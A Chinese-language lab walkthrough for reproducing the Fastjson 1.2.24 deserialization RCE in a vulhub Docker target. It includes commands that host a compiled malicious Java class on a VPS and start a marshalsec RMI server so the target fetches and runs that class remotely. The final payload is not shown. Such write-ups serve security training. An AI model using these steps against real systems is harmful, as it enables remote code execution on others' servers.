Fastjson 是一个 Java 库，可以将 Java 对象转换为 JSON 格式，当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象，即使是一些预先存在的没有源码的对象。 Fastjson 特性：

jdk环境 Maven环境 攻击机：192.168.31.159（win10） 靶机：192.168.30.128:8090(kali虚拟机通过docker搭建fastjson环境) http、rmi服务：106.13.9.xx（VPS服务器）

第一步： kali安装docker后下载靶场环境vulhub： https://blog.csdn.net/SuPejkj/article/details/103707207

cd /vulhub/fastjson/1.2.24-rce docker-compose up -d

第二步：此时kali中docker中已经启动了fastjson1.2.24环境，查看Kali地址通过浏览器访问。

第三步：jdk和Maven环境环境搭建，这里百度一抓一大把，就不在此处进行阐述了。

保存以下代码为Jimolang.java文件（这里文件名一定要和public class Jimolang类名报保持一致）：

这里注意代码中的{"ping", "xxx.dnslog.cn"} xxx.dnslog.cn就是我们的dnslog平台地址。

通过javac来编译当前java文件生成Jimolang.class文件（由于执行javac需要jdk环境，所以在第三步的时候需要安装jdk环境）

javac Jimolang.java

第四步：把生成的Jimolang.class文件传到公网vps中（我这里是公网的vps），然后在Jimolang.class目录中通过python3启动一个简单的http服务，命令如下：

python3 -m http.server 80

第五步：使用marshalsec项目，在公网的VPS中启动RMI服务，并且监听9999端口远程加载Jimolang.class类。

github项目地址：

git clone https://github.com/mbechler/marshalsec.git

下载完成后cd进入到marshalsec项目文件里，用刚刚安装好的maven环境执行如下命令进行编译,编译成功会生成一个target目录，出现如下编译成功。

mvn clean package -DskipTests

编译成功了以后会生成一个target目录，target目录下会生成marshalsec-0.0.3-SNAPSHOT-all.jar文件。

第六步：启动RMI服务，执行命令如下：

cd target/ java -cp marshalsec-0.0.3-SNAPSHOT-all.jarmarshalsec.jndi.RMIRefServer “http://刚刚上传的Jimolang.class的vps地址/#Jimolang” 9999

到此为止，我们的攻击环境已经准备好了，访问目标地址后通过burp抓包，然后构造payload执行即可。

查看dnslog查看存在回显记录。 查看vps上http服务请求日志，成功请求并且加载了Jimoalng.class类文件。